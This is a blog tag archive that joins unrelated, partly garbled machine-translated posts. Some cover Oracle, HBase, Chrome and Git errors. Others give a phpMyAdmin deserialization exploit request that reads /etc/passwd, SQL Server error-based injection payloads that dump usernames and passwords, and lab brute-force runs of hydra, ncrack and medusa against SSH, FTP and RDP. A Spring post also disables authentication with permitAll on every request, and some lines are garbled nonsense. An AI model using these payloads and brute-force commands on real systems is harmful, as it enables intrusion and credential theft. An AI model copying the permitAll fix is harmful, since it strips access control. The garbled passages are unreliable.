Tag Archives: security

Several problems caused by device encryption

Description: ora-12541tns no monitor program + velvet software icon turns black

Problem Description:                 

         After Oracle is unloaded and reloaded, ora-12541tns no monitor program will not appear for the time being, and then the problem of restarting the computer appears again — the problem solved from the perspective of Oracle (this problem will appear again in a few days after it is solved through other operations — the above error occurs when opening PL/SQL developer software.)

         At the same time, the tinder software icon turns black or the tinder software installation pop-up cannot be installed in the encrypted directory (prompt: when the tinder is installed in other disks other than disk C.).

        At this point, the big probability is due to the problem of device encryption.

resolvent:

        Turn off device encryption settings.

Process (simple operation, just two steps)

1. Window + Q output “device encryption”( The window key icon is similar to the key of the window where the window is turned on. It is generally located near FN in the lower left corner.)

2. Select close( It will take some time)

         I was puzzled by this problem for a period of time. During this period, I solved it through online methods. I even uninstalled Oracle and then reloaded it. At that time, it was solved and there was no problem. However, the problem will still appear later, which is more annoying.

         Later, I found out the problem. The problem is quite special and the solution is also quite special. I would like to share it with those who encounter similar and partial problems. Finally, I hope I can help you solve the problem.

       

      

Feignexception $unauthorized is reported by introducing security call service

Originally, it was a good idea to study spring cloud. Later, security was introduced for security. Then there were various problems. First, the service could not be registered (solution: after introducing security, the service could not be registered with Eureka), and then the service could not be called,

The error log is as follows:

feign.FeignException$Unauthorized: [401] during [GET] to [ http://eureka-client/client/test ] [ClientService#getClientService()]: [{“timestamp”:”2021-07-08T09:01:18.940+00:00″,”status”:401,”error”:”Unauthorized”,”message”:””,”path”:”/client/test”}]

It’s easy to understand if you read a newspaper error: the call has not been authenticated. This authentication is built-in to security. There are some methods on the Internet, but they are messy and many of them don’t work. Therefore, it’s recommended to turn off the built-in call authentication of security (add logic to the call authentication side to ensure security)

Add a configuration file to the server:

@Configuration
@EnableWebSecurity
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {

    @Override
    protected void configure(HttpSecurity httpSecurity) throws Exception {
        httpSecurity.authorizeRequests().anyRequest().permitAll().and().logout().permitAll();
    }

    @Autowired
    public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
        auth.userDetailsService(userDetailsService());
    }

}

Due to the version problem, sometimes you need to add additional notes to the startup file

@SpringBootApplication(exclude = {org.springframework.boot.autoconfigure.security.servlet.SecurityAutoConfiguration.class})

The test is effective
 

[vulnerability recurrence] phpMyAdmin scripts / setup.php deserialization vulnerability (wooyun-2016-199433)

[vulnerability recurrence] phpMyAdmin scripts/setup.php deserialization vulnerability (wooyun-2016-199433)

0x01 vulnerability background

There is a deserialization vulnerability in phpMyAdmin 2. X, through which an attacker can read arbitrary files or execute arbitrary code.

0x02 vulnerability environment

Building docker environment of vulhub

Execute the following command in/home/vulhub/phpMyAdmin/wooyun-2016-199433 to start phpMyAdmin:

docker-compose up -d

Check that the open port is 8080

After the environment is started, visit http://ip : 8080 , you can see the home page of phpMyAdmin. Because there is no connection to the database, an error will be reported at this time, but the exploitation of this vulnerability has nothing to do with the database, so it is ignored.

0x03 vulnerability recurrence

Capturing packets with BP

Send the following packets to read /etc/passwd :

POST /scripts/setup.php HTTP/1.1
Host: ip:8080
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

You can view the contents of the/etc/passwd file.

Chrome Error: Uncaught Error: SECURITY_ERR: DOM Exception 18

Uncaught Error: SECURITY_ERR: DOM Exception 18

Question:
I get the following error in Chrome’s developer tools window when I try to set a cookie using this jQuery plugin:

Uncaught Error: SECURITY_ERR: DOM Exception 18

What does this error mean and how can I fix it? I get the same error when I use this jQuery plugin.

Answer:
You’re most likely using this on a local file over the file://URI scheme, which cannot have cookies set. Put it on a local server so you can use http://localhost.

Can mybatis prevent SQL injection

1. Concept: what is SQL injection

sql injection : is a code injection technology, used to attack data-driven applications, malicious SQL statements are inserted into the executed entity fields.

It’s a common attack. If the attacker enters some special SQL fragments (such as “or 1 = 1”) on the form information or URL of the interface, it is possible to invade the application with incomplete parameter verification. Therefore, some work should be done in application development to prevent SQL injection. In some applications with high security requirements (such as banking software), SQL statements are usually replaced by stored procedures to prevent SQL injection. It’s a very safe way to deal with it.

answer: mybatis can prevent SQL injection, please continue to read.

2. Implementation: mybatis prevents SQL injection

<select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap">
  select id, username, password, role
     from user
        where username = #{username,jdbcType=VARCHAR}
        and password = #{password,jdbcType=VARCHAR}
</select>
<select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap">
    select id, username, password, role
        from user
        where username = ${username,jdbcType=VARCHAR}
        and password = ${password,jdbcType=VARCHAR}
</select>

the difference between # and $ in mybatis:

1. # will treat all incoming parameters as a string, and will automatically add a double quotation mark to it.

For example: where user name = # {user name}, if the value passed in is 111, then the value parsed into SQL is where user name = # {user name}. If the value passed in is ID, then the value parsed into SQL is where user name = # {user name}

2. $ directly displays and generates the incoming data in SQL.

For example: where user name = ${user name}, if the value passed in is 111, then the value parsed into SQL is where user name = 111

If the passed in value is; drop table user;, then the parsed SQL is: select id, username, password, role from user where username =; drop table user

3. The # method can prevent SQL injection to a great extent, while the $ method cannot prevent SQL injection.

4. The $ method is generally used to pass in database objects, such as table names

5. It is recommended to use #, to avoid using $. If you have to use parameters like “${XXX}”, you need to do a good job in filtering to prevent SQL injection attacks.

6. In mybatis, parameters with “${XXX}” format will directly participate in SQL compilation, so injection attack cannot be avoided. But when it comes to dynamic table names and column names, we can only use parameter formats like “${XXX}”. Therefore, such parameters need to be handled manually in the code to prevent injection.

[Conclusion] the format of “# {XXX}” should be used as much as possible when writing the mapping statement of mybatis. If you have to use parameters like “${XXX}”, you should do a good job of filtering manually to prevent SQL injection attacks.

3. Principle analysis: how does mybatis prevent SQL injection

Mybatis framework is a semi-automatic persistence layer framework , SQL statements need to be written manually by developers, at this time, SQL injection must be prevented. In fact, mybatis SQL has the function of “ input + output “, which is similar to the function structure. Please refer to the above two examples. Among them, parametertype indicates the input parameter type and resulttype indicates the output parameter type. In retrospect, if you want to prevent SQL injection, you have to do something about the input parameters. In the above code, #, is the part where input parameters are spliced in SQL. After the parameters are passed in, the executed SQL statement will be printed out, as follows:

select id, username, password, role from user where username=?and password=?

That is, no matter what kind of parameters you enter, the printed SQL will look like the above. Reason: mybatis enables the precompile function. Before SQL execution, SQL will be sent to the database for compilation. During execution, the compiled SQL will be used directly, and the parameter can replace the “?” in the place holder. Because SQL injection can only work on the compilation process, this way can avoid SQL injection attack.

[underlying implementation principle] how does mybatis precompile SQL?In fact, at the bottom of the framework, it is the Preparedstatement class in JDBC that works. Preparedstatement is a subclass of statement that we are very familiar with. Its objects contain compiled SQL statements. This “ready” approach not only improves security, but also improves efficiency when executing the same SQL multiple times. The reason is that the SQL has been compiled and there is no need to compile it again.

//Safe, pre-compiled
Connection conn = getConn();//Get the connection
String sql = "select id, username, password, role from user where id=?" ; // the statement will be pre-compiled before executing sql
PreparedStatement pstmt = conn.prepareStatement(sql); 
pstmt.setString(1, id); 
ResultSet rs=pstmt.executeUpdate(); 
......

//Unsafe, not pre-compiled
private String getNameByUserId(String userId) {
    Connection conn = getConn();//connected
    String sql = "select id,username,password,role from user where id=" + id;
    //When the id parameter is "3;drop table user;", the executed sql statement is as follows:
    //select id,username,password,role from user where id=3; drop table user;  
    PreparedStatement pstmt =  conn.prepareStatement(sql);
    ResultSet rs=pstmt.executeUpdate();
    ......
}

Conclusion

#{}: equivalent to Preparedstatement in JDBC

${}: is the value of the output variable

In short: # {} needs to be precompiled, which is safe; ${} only takes variable values without precompiling, which is not safe, and there is a risk of SQL injection attack.

If ${} is used after the order by statement, there is a risk of SQL injection when nothing is done. Need to develop this code level parameter verification, filtering parameters, parameter length, whether in the expected set, whether contains special or database keywords.

Push failed Unable to access ‘https://github.com/‘: Failed to connect to github.com port 443: Timed

Remote push error to GitHub warehouse:

Push failed Unable to access ‘ https://github.com/ ‘: Failed to connect to github.com port 443: Timed out

terms of settlement:

Find the GitHub login Certificate in the certificate manager of the control panel and modify the account password.

You can also open it quickly through the CMD window, enter: rundll32.exe keymgr.dll ,KRShowKeyMgr

Spring security failed to log in, error: there is no passwordencoder mapped for the ID “null”

After writing the websecurityconfig class that inherits the websecurityconfigureradapter class, we need to define authentication in the configure (authentication manager builder auth) method, which is used to obtain information sources and password verification rules. (the name of the configure function doesn’t matter. The official name seems to be configureglobal (…) )It is important to configure the authenticationmanagerbuilder in the class annotated by @ enablewebsecurity or @ enableglobalmethodsecurity or @ enableglobalauthentication).

The source of authentication information I used at the beginning was in memory authentication. The code is as follows

 
    protected void configure (authentication manager auth) throws exception { // inmemoryauthentication gets from memory auth.inMemoryAuthentication ().withUser("user1").password("123456").roles("USER"); }

The login page of spring security is used. As a result, when logging in, the user name and password are correct, and the resource cannot be opened, so it still stays on the login page. There is no passwordencoder mapped for the ID "null".

Baidu found that this is because spring security 5.0 added a variety of encryption methods, but also changed the password format.

Let's take a look at the official documents. Here are the original words of the official documents:

 

-------------------------------------------------------------------------------------------------------------------

The general format for a password is:

{id}encodedPassword

Such that id is an identifier used to look up which PasswordEncoder should be used and encodedPassword is the original encoded password for the selected PasswordEncoder. The id must be at the beginning of the password, start with { and end with }. If the id cannot be found, the id will be null. For example, the following might be a list of passwords encoded using different id. All of the original passwords are "password".

{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM/BG 
{noop}password 
{pbkdf2}5d923b44a6d129f3ddf3e3c8d29412723dcbde72445e8ef6bf3b508fbf17fa4ed4d6b99ca763d8dc 
{scrypt}$e0801$8bWJaSu2IKSn9Z9kM+TPXfOc/9bdYSrN1oD9qfVThWEwdRTnO7re7Ei+fUZRJ68k9lTyuTeUp4of4g24hHnazw==$OAOec05+bXxvuu/1qZ6NUR+xQYvYv7BeL1QxwRpY5Pc=  
{sha256}97cde38028ad898ebc02e690819fa220e88c62e0699403e94fff291cfffaf8410849f27605abcbc0

-------------------------------------------------------------------------------------------------------------------

 

The storage format of passwords in spring security is "{ID}.....". The front ID is the encryption method, the ID can be bcrypt, sha256, etc., followed by the encrypted password. In other words, when the program gets the passed password, it will first find the ID included by "{" and "}" to determine how the subsequent password is encrypted. If it cannot be found, it will be considered that the ID is null. This is why our program will report an error: there is no passwordencoder mapped for the ID "null". In the example of official documents, various encryption methods are used to encrypt the same password. The original password is "password".

 

If we want our project to log in normally, we need to modify the code in configure. We need to encrypt the password from the front end in some way. Spring security officially recommends using bcrypt encryption. So how to encrypt the password?Just specify it in the configure method.

After modification, it looks like this:

 
    protected void configure (authentication manager auth) throws exception { // inmemoryauthentication gets from memory auth.inMemoryAuthentication ().passwordEncoder(new BCryptPasswordEncoder()).withUser("user1").password(new BCryptPasswordEncoder().encode("123456")).roles("USER"); }

After inmemoryauthentication(), there is ". Passwordencoder (New bcryptpasswordencoder())", which is equivalent to using bcrypt encryption to process the user password when logging in. The previous ". Password (" 123456 ")" is changed to ". Password (New bcryptpasswordencoder(). Encode (" 123456 ")", which is equivalent to bcrypt encoding and encryption of the password in memory. The comparison is consistent, which indicates that the password is correct and login is allowed.

If you are also using the password from the memory, then according to the above modification should be successful login, no problem.

If you use to store the user name and password in the database, you usually use bcrypt code to encrypt the user password and store it in the database. And modify the configure() method, add ". Passwordencoder (New bcryptpasswordencoder())" to ensure that users use bcrypt to process the password when they log in, and then compare it with the password in the database. As follows:

 
    // inject the implementation class of userdetailsservice auth.userDetailsService (userService).passwordEncoder(new BCryptPasswordEncoder());
     

reprint https://blog.csdn.net/canon_ in_ d_ major/article/details/79675033

Solution of server not running yetexception in HBase

I encountered a server not running yetexception error while working today. The symptom is that it is normal to enter HBase shell, but this error will be thrown when executing any instruction.

There is no error message when checking the log. At first I thought there was HBase process not up, but the JPS command showed that all started.

It’s a little tricky.. Because the test server was restarted a few days ago, and then I did some other work on it. So it is suspected that the problem is port occupancy.. However.. Neither..

I had no choice, so I moved out the ultimate solution: reloading Hadoop and HBase. After the official configuration is completed. HBase is miraculously good..

I once suspected that it was my configuration.. However.. Neither..

Finally found a solution on the Internet, because Hadoop is in a safe mode. So HBase operation will be abnormal. I’m not sure how it works. The solution is to manually exit safe mode

./hadoop dfsadmin -safemode leave 

Then restart HBase and solve the problem

Uncaught error: call to undefined function MySQL when building sqli lab environment with phpstudy_ Connect() error

The problem

Uncaught Error: Call to undefined function mysql_connect()

why
In PHP 5+, you can use both mysql_connect() and mysqli_conncet() instead of mysqli_conncet().
The solution
In the PHPStudy environment, you can downgrade the PHP version by selecting the PHP5 + version.
>
>

Web site – & gt; Management – & gt; PHP version. (You can choose to replace an older version of PHPStudy.)
If you want to use php7 without changing the code, you can use the admin ->; For PHP extensions, check the box before php_mysql.

12-web security — error injection based on SQL Server — and, convert, cast

We know that SQL Server is developed by Microsoft, a very good database, can accurately locate the error message, this is very developer friendly, especially for Web security workers, using SQL Server error information to effectively penetrate the target system test.
 
Id =1′ and 1=(@@version)–+;

When executing SQL statement, the database will treat the contents in parentheses of 1=(@@Version) statement as the number of int type. However, @@Version itself is a string of type NVARCHAR. SQL Server will fail to convert NCARCHAR into INIT type and report an error.
 
SQL Server error injection principle is the use of data type conversion error. The character type is converted into a number of characters, but the form of expression is still characters, resulting in the database can not identify the error, at the same time in the process of error will also show the SQL statement query information, such as the database version of the query information combined with the error information back to the page.
 
For example, you can construct a SQL statement by inputing an error query into all table names in the current database:

id=1' and 1=(select top 1 table_name from information_schema.tables)--+


Note that since the = sign precedes the parentheses and the SELECT statement produces more than one result, you need to combine the top statement to limit the result of the query to one, display the result to the Web page by error, and then use the top n statement to query the following table names.
 
 
You can also use the FOR XML PATH and the QUOTENAME statement to display the result as a single line to construct the SQL statement:

select quotename(table_name) from information_schema.tables for xml path('')

 
 
Select * from user where user = ‘user’;

select quotename(column_name) from information_schema.columns where table_name='users' for xml path('')

 
Select * from user where user name = ‘user’ and password = ‘user’;

select username,':',password,'|' from users for xml path('')

 
Usually, the page may not be able to display all the user names and passwords due to the number of characters displayed. Substring function can be used to display the query results in sections, starting from the first character and displaying 250 characters:

select substring((select username,':',password,'|' from users for xml path('')),1,250)

SQL Server databases use the Substring function in the same way as MySQL does.
 
 
Select * from users where user = ‘users’;

 
 

Error injection based on convert and cast functions.

The convert function takes the time to define a datatype (format) in the form of:

convert(data_type(length),data_to_be_converted,style)

Parameters to the convert function:
DATA_TYPE (LENGTH) : Indicates the defined data type, and LENGTH represents the optional length
Data_to_be_converted: time, that is, the value of the need to transform
Style: Represents the output format of the specified time/date
 
 
Convert function:

 
VARCHAR (20) represents the data type defined as VARCHAR with a length of 20, getdate is used to get the current time, 111 represents the time output in year/month/day (i.e. 2020/07/11) format.
 
An error occurs if the convert function converts the database name to an int (such as the SQL statement select convert (int, db_name(), 111)), and the name of the database is also exposed.
 
 
Error injection based on the convert function:

id=1' and 1=convert(int,db_name(),111) --+


For the above SQL statements, the convert function will be the second parameter db_name after () attempts to convert the result of the type int, but because the db_name () returns is nvarchar type, the result of the SQL server cannot converting nvarchar type specified int type, so the convert function will be an error prompt, at the same time will be the second parameter specifies the results of the query of SQL statement together with the error message came out
 
The cast function converts one data type to another. The cast function is a function that converts one data type to another.

cast(expression as data_type)

CAST Parameter Description:
Expression: Any valid SQL Server expression
As: is used to split two parameters. The parameter before as (expression) is the data to be processed, and the parameter after as (data_type) is the data type to be converted
DATA_TYPE: Data types supplied by the target system, including BIGINT and SQL_VARLANT, cannot use user-defined data types
 
The cast function is used as follows:

 
SQL> convert 123456 to int;
 
 
The cast function converts the database name to an int, and the cast function reveals the database name security.

 
 
 
Error injection based on CAST function:

id=1' and 1=cast(host_name() as int) --+


 
 
SQL> select table names from sysobjects; select table names from sysobjects; select table names from sysobjects;

select quotename(name) from sysobjects where xtype='u' for xml path('')


 
 
SQL> select column name from column name;

select quotename(name) from syscolumns where id=(select id from sysobjects where name='users' and xtype='u') for xml path('')


 
 
 
SQL> select * from users where user = ‘user’;

select substring((select username,':',password,'|' from users for xml path('')),1,250)


 
In addition to displaying the username and password piecemeal using the Substring function, you can also display the username and password sequentially using the exclusion method.
 

Brute Forcing Passwords with ncrack, hydra and medusa

https://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/

Lets test some password breaking tools. Password’s are often the weakest link in any system. Testing for weak passwords is an important part of security assessments.
I am going to focus on tools that allow remote service brute forcing. These are typically Internet facing services that are accessible from anywhere in the world. Another type of password brute forcing is attacks against the password hash, using tools such as Hashcata powerful tool that is able to crack encrypted password hashes on a local system.
The three tools I will assess are Hydra, Medusa and Ncrack (from nmap.org).
Installation of all three tools was straight forward on Ubuntu Linux.

wget https://nmap.org/ncrack/dist/ncrack-0.5.tar.gz
./configure
make
make install

wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
./configure
make
make install

wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
./configure
make
make install

Then I grabbed a list of 500 passwords from skullsecurity.org. Of course you can find password lists with many thousands or even millions of passwords. You will need to chose what is the most appropriate for your password testing as factors such as target type and rate of testing will be major factors.

wget http://downloads.skullsecurity.org/passwords/500-worst-passwords.txt

This testing was performed against a Linux Virtual Machine running on Virtualbox.
The first series of tests was against SSH. I set the root account with the password toor. I added toor to the end of the 500 password list at number 499.

~# hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser/THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-05 16:45:19
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 185.00 tries/min, 185 tries in 00:01h, 315 todo in 00:02h
[STATUS] 183.00 tries/min, 366 tries in 00:02h, 134 todo in 00:01h
[22][ssh] host: 10.10.10.10   login: root   password: toor
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-05 16:48:08

Successfully found the password with Hydra!

~# ncrack -p 22 --user root -P 500-worst-passwords.txt 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-05 16:50 EST
Stats: 0:00:18 elapsed; 0 services completed (1 total)
Rate: 0.09; Found: 0; About 6.80% done; ETC: 16:54 (0:04:07 remaining)
Stats: 0:01:46 elapsed; 0 services completed (1 total)
Rate: 3.77; Found: 0; About 78.40% done; ETC: 16:52 (0:00:29 remaining)

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 138.03 seconds.

Ncrack finished.

Successfully found the password with Ncrack!

# medusa -u root -P 500-worst-passwords.txt -h 10.10.10.10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks 

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: password (2 of 500 complete)

<< --- SNIP --->>>

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: billy (498 of 500 complete)
ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: toor (499 of 500 complete)
ACCOUNT FOUND: [ssh] Host: 10.10.10.10 User: root Password: toor [SUCCESS]

~ 1500 seconds
Success again with Medusa, however it took over 10 times as long with the default settings of each tool.
Lets try and speed things up a bit. cranking up Medusa speed to use 5 concurrent logins fails with the following error:

ACCOUNT CHECK: [ssh] Host: 10.10.10.10 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: mustang (7 of 500 complete)
medusa: ath.c:193: _gcry_ath_mutex_lock: Assertion `*lock == ((ath_mutex_t) 0)' failed.
Aborted

Trying Ncrack at a faster rate was a bit faster but not much.

ncrack -p ssh -u root -P 500-worst-passwords.txt -T5 10.10.10.10

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 09:04 EST

Discovered credentials for ssh on 10.10.10.10 22/tcp:
10.10.10.10 22/tcp ssh: 'root' 'toor'

Ncrack done: 1 service scanned in 128.98 seconds.

Ncrack finished.

Is Hydra any faster?Here I added the option for 32 threads.

$ hydra -t 32 -l root -P 500-worst-passwords.txt 10.10.10.10 ssh
Hydra v6.3 (c) 2011 by van Hauser/THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 12:44:03
[DATA] 32 tasks, 1 servers, 500 login tries (l:1/p:500), ~15 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 184.00 tries/min, 184 tries in 00:01h, 316 todo in 00:02h
[STATUS] 185.50 tries/min, 371 tries in 00:02h, 129 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
[22][ssh] host: 10.10.10.10   login: root   password: toor
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 12:46:57

No change really. Perhaps the limiting factor for Hydra and Ncrack is the speed of response from the VirtualBox machine. Either way it appears the default speed is pretty good for both tools.
Now to try hitting the FTP server on the same host (vsftpd).

ncrack -u test -P 500-worst-passwords.txt 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:53 EST
Stats: 0:00:40 elapsed; 0 services completed (1 total)
Rate: 5.94; Found: 0; About 47.20% done; ETC: 12:54 (0:00:45 remaining)
Stats: 0:00:59 elapsed; 0 services completed (1 total)
Rate: 6.93; Found: 0; About 88.00% done; ETC: 12:54 (0:00:08 remaining)

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 69.01 seconds.

Attempting to push it faster….

$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 12:55 EST
Stats: 0:00:03 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done
Stats: 0:00:06 elapsed; 0 services completed (1 total)
Rate: 0.00; Found: 0; About 0.00% done

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 66.01 seconds.

Same result. Limiting factor is likely the VM.

$ hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ftp
Hydra v6.3 (c) 2011 by van Hauser/THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-05-06 13:07:43
[DATA] 16 tasks, 1 servers, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ftp on port 21

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

[STATUS] 219.00 tries/min, 219 tries in 00:01h, 281 todo in 00:02h
Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd
[STATUS] 233.06 tries/min, 470 tries in 00:02h, 30 todo in 00:01h
[STATUS] attack finished for 10.10.10.10 (waiting for children to finish)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-05-06 13:09:56

Oops, did we crash the FTP service?
Now testing with Medusa.

~$ medusa -u test -P 500-worst-passwords.txt -h 10.10.10.10 -M ftp
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun/Foofus Networks 

ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 123456 (1 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: password (2 of 500 complete)
ACCOUNT CHECK: [ftp] Host: 10.10.10.10 (1 of 1, 0 complete) User: test (1 of 1, 0 complete) Password: 12345678 (3 of 500 complete)
ERROR: [ftp.mod] failed: medusaReceive returned no data. Server may have dropped connection due to lack of encryption. Enabling the EXPLICIT mode may help.
CRITICAL: Unknown ftp.mod module state -1

Medusa also appears to be struggling.
Lets go back and check again with ncrack to ensure the service is still ok.

~$ ncrack -u test -P 500-worst-passwords.txt -T 5 10.10.10.10 -p 21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:14 EST

Discovered credentials for ftp on 10.10.10.10 21/tcp:
10.10.10.10 21/tcp ftp: 'test' 'toor'

Ncrack done: 1 service scanned in 62.99 seconds.

Ncrack finished.

ncrack for the win!
ncrack has the ability to also brute force RDP accounts. So lets now hit a Windows box with Microsoft Remote Desktop Protocol enabled.

$ ncrack -u administrator -P 500-worst-passwords.txt -p 3389 10.212.50.21

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-06 13:26 EST
Stats: 0:02:18 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 3.40% done; ETC: 14:33 (1:05:21 remaining)
Stats: 0:15:07 elapsed; 0 services completed (1 total)
Rate: 0.20; Found: 0; About 13.80% done; ETC: 15:15 (1:34:25 remaining)
Stats: 0:22:19 elapsed; 0 services completed (1 total)
Rate: 0.02; Found: 0; About 19.40% done; ETC: 15:21 (1:32:43 remaining)
Stats: 0:24:46 elapsed; 0 services completed (1 total)

Discovered credentials for rdp on 10.212.50.21 3389/tcp:
10.212.50.21 3389/tcp rdp: 'administrator' 'toor'

Ncrack done: 1 service scanned in 6072 seconds.

Protocols supported include:

Hydra - TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA

Medusa -  AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper,
Web Form

Ncrack - RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet

There is much more that could be tested for a more comprehensive review. Other protocols, different targets, latency and Further tweaking of the scan speeds and threads.
While ncrack has limited protocol support compared to Hydra and Medusa the only conclusion for this little test; when it comes to speed, reliability and the ability to hit RDP services ncrack wins!!